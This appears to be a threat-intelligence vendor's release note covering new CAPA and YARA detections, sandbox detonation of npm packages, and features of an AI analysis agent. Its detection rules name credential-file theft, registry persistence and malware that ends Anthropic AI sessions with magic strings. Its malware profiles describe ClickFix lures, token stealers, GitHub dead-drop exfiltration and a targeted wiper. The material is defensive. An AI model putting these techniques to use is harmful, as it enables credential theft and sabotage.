May 18th, 2026 - Automated Package Sandbox Detonation, Advanced Attribute Pivoting, Expanded Collections & Deep Malware Format Analysis in Agentic, CAPA Binary Enhancements, and more

📢 Google TI Mondays. Quick reminder to Follow the Google TI Mondays series across our social platforms every week for quick, actionable practitioner tips and product adoption advice designed to enhance your efficiency. These actionable tips are essential. #GoogleTIMondays

💪 Enhanced PE and ELF Binary Behavior Detections. CAPA, a tool maintained by the FLARE team , provides human-readable explanations of suspicious behavior that a binary may exhibit when executed. Our platform runs CAPA on all PE and ELF binaries, displaying results in the BEHAVIOR tab of the UI. Lately CAPA has been updated with 26 new and 17 improved behavior detection rules, which have been fully integrated into our supported file analysis process. This enhancement adds new rules focused on credential access, environment discovery, and defense evasion observed in malware, including:

behavior_signature:"terminate Anthropic session via magic strings": use magic strings to terminate Anthropic AI sessions.
behavior_signature:"access AWS credentials": access AWS configuration and credential files.
behavior_signature:"access Docker credentials": access Docker configuration and credential files.
behavior_signature:"access GCP credentials": access Google Cloud Platform configuration and credential files.
behavior_signature:"get custom HTTP header": retrieve custom HTTP headers.
behavior_signature:"get HTTP response date": retrieve the Date header from an HTTP response.
behavior_signature:"run as NodeJS native module": execute as a native module in NodeJS.
behavior_signature:"persist via ShellServiceObjectDelayLoad registry key": maintain persistence by loading COM objects at startup.

See example.

Check out CAPA’s full release notes for more details.

💪 Detection Highlights. The Google Threat Intelligence Group and FLARE team provide ongoing updates to Google TI's YARA rules. This week, we released YARA rules covering 5 newly tracked malware families. We prioritize the creation of new and updated detection content based on malware families actively observed in Mandiant incident response engagements, Google SecOps customer environments, and top Google TI search trends.

As we identify new malware families through our research, we develop and deploy detection signatures. Recent additions include:

NEONSLIDE: a JavaScript-based downloader that displays full-page overlays leveraging the ClickFix technique to convince the user to copy and run a malicious command to download and execute a follow-on payload. It employs anti-analysis checks, fingerprints the victim environment, and tracks local execution state. Once verified, it downloads secondary JavaScript modules into the Document Object Model (DOM) to generate full-page overlays such as fake browser updates, Cloudflare checks, or Blue Screen of Death (BSOD) errors. NEONSLIDE retrieves its active command-and-control (C2 or C&C) server via either hard-coded URLs or blockchain smart contracts.
DUSTMAKER: a heavily-obfuscated JavaScript credential stealer that harvests cloud and developer authentication tokens (including AWS, Azure, GCP, GitHub, and NPM) via local filesystem scans and built-in SDKs, exfiltrating the data via HTTP POST requests and secondary GitHub repositories.
FIRESCALE: a modular, Python-based credential stealer and data theft payload that also incorporates a localized, conditional wiper. The malware concurrently deploys multiple collector modules to harvest cloud provider secrets, Kubernetes configurations, local developer credentials, and password manager vaults. Stolen data is aggregated, encrypted, and exfiltrated using a multi-tiered approach that falls back to creating GitHub dead drops if the primary command-and-control servers are unreachable. It features a targeted logic bomb that checks for Israeli or Iranian geographic markers, invoking a random chance to trigger a destructive file wipe on the host machine.
SHADOWRICE: a memory-only dropper written in VBScript that is often concealed within benign files. SHADOWRICE leverages COM objects for in-memory Base64 payload decoding to execute embedded PowerShell scripts. To evade detection, the dropper launches these scripts via temporary Windows Scheduled Tasks, effectively masking the malicious process chain.
SILVERSHED: a credential stealer that is written in .NET. The sample targets multiple browsers like Google Chrome and Microsoft Edge and multiple applications like Telegram, FileZilla, and OpenVPN.

In addition to providing detection rules for new and emerging threats, we continue to update our detection systems for established threats like VIDAR, DARKCRYSTALRAT, and EMPIRE. These updates ensure that our YARA coverage remains robust against the latest variants and indicators observed in the wild.

See latest malware family profiles added to the knowledge base and the complete list of curated YARA rules in our database.

💪Automated Sandbox Detonation for Node, NPM, and NPX Packages/Installers. The Google TI Dynamic Analysis Sandboxes provide an isolated, secure environment where submitted files are detonated in real-time to observe their actual behavior, registry changes, network communications, and system modifications. It allows security analysts to uncover hidden, highly obfuscated, or time-delayed malicious payloads that static analysis alone might miss, turning unknown files into actionable behavioral intelligence.
Now, when a user submits a scripting file (such as a shell script, batch file, or PowerShell script) that attempts to install a Node.js, npm, or npx package, the sandbox will now automatically detect these package manager calls, safely execute the full package installation process within the isolated runtime, and monitor everything the package does. All captured telemetry, dropped files, and network connections are then populated directly under the BEHAVIOR tab of the file analysis report.

See example.

💪 Agentic Evolution: Expanded Object Collections Creation. Agentic is an AI-powered analysis interface built to automate complex investigative workflows within Google Threat Intelligence. By leveraging specialized agents with direct access to our vast threat intelligence dataset, users can rapidly summarize threats, analyze malicious logic, and pivot through infrastructure using natural language. Agentic acts as a force multiplier for security teams, transforming tedious manual hunting and pivoting into conversational tasks.
We have significantly upgraded Agentic’s workflow generation capabilities. Agentic can now automatically create and organize advanced threat intelligence object collections via natural language commands. Users can instruct the agent to build private structured collections such as: Campaigns, Threat Actors, Reports, Malware Family, etc.

💪 Agentic Deep Structural Metadata Analysis for LNK, VBA, and .NET Formats. Agentic is fully equipped to perform deep metadata structural analysis and frequency distribution calculations on specific internal metadata fields now for three critical malware delivery formats:

LNK (Windows Shortcuts)
VBA (Office Macros)
DotNet / .NET (Compiled Binaries)

Prompt examples:

“I would like to obtain aggregations based on LNK files and the target binary used in their metadata, only from those submitted in the last 30 days and having 5 positives”
“Obtain samples related to asyncrat and then tell me the most used type definitions to understand behavior related to this family”

💪 Relevant Attribute Pivoting in Agentic for Similarity Hunting. We have enhanced Agentic’s ability to pivot across IoC relationships by leveraging the Get Entity Prevalence tool to analyze key threat attributes. This optimization allows the agent to automatically surface critical data relationships, enabling analysts to identify similar entities and map out related infrastructure with significantly greater accuracy.